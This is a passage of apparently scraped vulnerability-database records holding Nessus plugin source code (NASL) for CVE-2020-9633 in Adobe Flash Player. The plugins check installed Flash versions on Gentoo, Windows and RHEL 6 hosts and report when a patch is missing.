'>=www-plugins/adobe-flash-32.0.0.387'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", 
value:\"CVE-2020-9633\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/17\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 32.0.0.387\"), vulnerable:make_list(\"lt 32.0.0.387\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 0.0, 
"vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:53", "description": "The remote Windows host is missing security update KB4561600. It is, therefore, affected by an use after free vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code within the context of the user.", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561600: Security update for Adobe Flash Player (June 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2020-10-16T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS20_JUN_FLASH.NASL", "href": "https://www.tenable.com/plugins/nessus/137265", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137265);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"MSKB\", value:\"4561600\");\n script_xref(name:\"MSFT\", value:\"MS20-4561600\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"KB4561600: Security update for Adobe Flash Player (June 2020)\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4561600. It is, therefore, affected by an use after free\nvulnerability. 
An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary\ncode within the context of the user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\");\n # https://support.microsoft.com/en-us/help/4561600/security-update-for-adobe-flash-player\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aed1c537\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB4561600 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-06\";\nkbs = make_list('4561600');\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\niver = join(iver, sep:\".\");\n\n# all <= 32.0.0.371\nfix = FALSE;\nif(ver_compare(ver:iver, fix:\"32.0.0.371\", strict:FALSE) <= 0)\n fix = \"32.0.0.387\";\n\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n fix\n)\n{\n 
info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n security_report_v4(severity:SECURITY_HOLE, port:port, extra:hotfix_get_report() + report);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-13T14:33:26", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by a vulnerability as referenced in the RHSA-2020:2547 advisory.\n\n - flash-plugin: Arbitrary Code Execution vulnerability (APSB20-30) (CVE-2020-9633)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-17T00:00:00", "type": "nessus", "title": "RHEL 6 : flash-plugin (RHSA-2020:2547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:rhel_els:6", "cpe:/o:redhat:rhel_eus:6.0", "p-cpe:/a:redhat:enterprise_linux:flash-plugin"], "id": "REDHAT-RHSA-2020-2547.NASL", "href": "https://www.tenable.com/plugins/nessus/137409", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:2547. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137409);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"RHSA\", value:\"2020:2547\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"RHEL 6 : flash-plugin (RHSA-2020:2547)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by a vulnerability as referenced in\nthe RHSA-2020:2547 advisory.\n\n - flash-plugin: Arbitrary Code Execution vulnerability (APSB20-30) (CVE-2020-9633)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-9633\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:2547\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1845700\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-plugin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(416);\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/client/6/6Client/i386/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/os',\n 'content/dist/rhel/client/6/6Client/i386/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/os',\n 'content/dist/rhel/client/6/6Client/i386/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/os',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/debug',\n 
'content/dist/rhel/client/6/6Client/x86_64/optional/os',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/os',\n 'content/dist/rhel/client/6/6Client/x86_64/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/os',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/debug',\n 
'content/dist/rhel/server/6/6Server/i386/highavailability/os',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/optional/debug',\n 'content/dist/rhel/server/6/6Server/i386/optional/os',\n 'content/dist/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/os',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/os',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/os',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/os',\n 
'content/dist/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/os',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/debug',\n 
'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/os',\n 'content/els/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/os',\n 'content/els/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/os',\n 'content/els/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/os',\n 
'content/els/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/debug',\n 'content/fastrack/rhel/client/6/i386/optional/debug',\n 'content/fastrack/rhel/client/6/i386/optional/os',\n 'content/fastrack/rhel/client/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/os',\n 'content/fastrack/rhel/client/6/i386/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/os',\n 'content/fastrack/rhel/client/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/os',\n 'content/fastrack/rhel/client/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/os',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/os',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/os',\n 'content/fastrack/rhel/server/6/i386/highavailability/source/SRPMS',\n 
'content/fastrack/rhel/server/6/i386/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/os',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/optional/debug',\n 'content/fastrack/rhel/server/6/i386/optional/os',\n 'content/fastrack/rhel/server/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/os',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/server/6/x86_64/hpn/os',\n 'content/fastrack/rhel/server/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/os',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/optional/debug',\n 'content/fastrack/rhel/server/6/x86_64/optional/os',\n 'content/fastrack/rhel/server/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/os',\n 'content/fastrack/rhel/server/6/x86_64/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/server/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/debug',\n 
'content/fastrack/rhel/workstation/6/i386/optional/debug',\n 'content/fastrack/rhel/workstation/6/i386/optional/os',\n 'content/fastrack/rhel/workstation/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/i386/os',\n 'content/fastrack/rhel/workstation/6/i386/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/os',\n 'content/fastrack/rhel/workstation/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/workstation/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/workstation/6/x86_64/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'flash-plugin-32.0.0.387-1.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n var enterprise_linux_flag = rhel_repo_urls_has_content_dist_rhel(repo_urls:repo_relative_urls);\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp']) && !enterprise_linux_flag) sp = pkg['sp'];\n if 
